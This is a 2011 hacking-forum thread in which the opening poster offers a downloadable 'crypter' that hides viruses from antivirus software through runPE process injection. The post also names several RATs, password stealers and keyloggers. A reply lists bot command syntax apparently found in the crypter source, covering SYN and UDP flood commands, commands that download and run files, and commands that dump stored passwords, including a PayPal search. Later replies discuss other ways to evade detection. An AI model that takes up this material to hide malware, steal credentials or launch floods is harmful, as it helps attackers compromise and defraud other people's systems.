Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

0

1 votes

Crypter overview

Started by cipher, Jan 05 2011 06:37 PM

Please log in to reply

5 replies to this topic

#1 cipher

RE Is My Profession !!!

(Full Member)
69 posts

Gender:Male
Location:In Encrypted Text
Interests:RE,Hacking............

Posted 05 January 2011 - 06:37 PM

hello

   i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses.

   These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi.

Examples :
1) RATS       : cybergate,Blackshades,pixel,spynet,darkcomet etc
2) STEALERS   : Istealer v6.0(latest),Albertino,maya password stealer etc
3) KEYLOGGERS : Albertino , Rapzo ,Irtech etc
4) Crypters   : icrypt , galaxy ,balckout AIO,demon ,cypherx(www.crypters.net) etc.

The sample crypter  source code is attached here .

Attached Files

CodingNation_Crypter_Source.rar 127.33K 156 downloads

Back to top

#2 MetroidzZ

Newbie

(Junior)
1 posts

Posted 29 March 2011 - 09:10 PM

thanks

Back to top

#3 ksanket

Member

(Full Member)
73 posts

Gender:Male

Posted 30 March 2011 - 02:47 AM

http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801

http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813

i think the below code must not be present in a crypter project this makes it behave like a bot

hello [login]
.bai [logout]
.removeAll [removes ALL bots]

DDoS CMDs

./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful might destroy bots

Download/Update

./download (http://site.com/file.exe C:\file.exe 1)
./update (????)

MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)

Back to top

#4 xXb3b3Xxl

Newbie

(Junior)
1 posts

Posted 31 May 2011 - 05:34 PM

check it..................

Back to top

#5 Blue Indian

Team IREC

(Full Member)
127 posts

Gender:Male
Location:Some where in India
Interests:****ing protected exe , cracking and coding

Posted 01 June 2011 - 10:07 PM

@Cipher : Thanks Mate, but old guddys i played with them when I was learning CEH. This guddys are no more, for example in our team ICA, we dont use like this.
Try the self mod version of Fly Crypter.
And also nice name collection of RAT's.

@ksanket : These codes are not used to make behave like a bot, this codes are part of Trojan or stealer's.

"If there is one place on the earth where all the dreams of living men have found a home from the very earliest days,when men begains to dream of existence,It is INDIA"
--Romaine Rolland
Contact http://www.teamirec.com http://teamirec.forumotion.in http://twitter.com/teamirec and http://www.teamirec.co.in

Back to top

#6 cipher

RE Is My Profession !!!

(Full Member)
69 posts

Gender:Male
Location:In Encrypted Text
Interests:RE,Hacking............

Posted 22 July 2011 - 10:26 AM

@Blue indian : i guess you are talking about polymorphic engine , but still 99% of the crypters in market uses the same PE injection technique.

i Dunno much about the polymorphic engine tho still they manage to make it FUD by adding junk code , by changing the variable names and by some advanced techniques.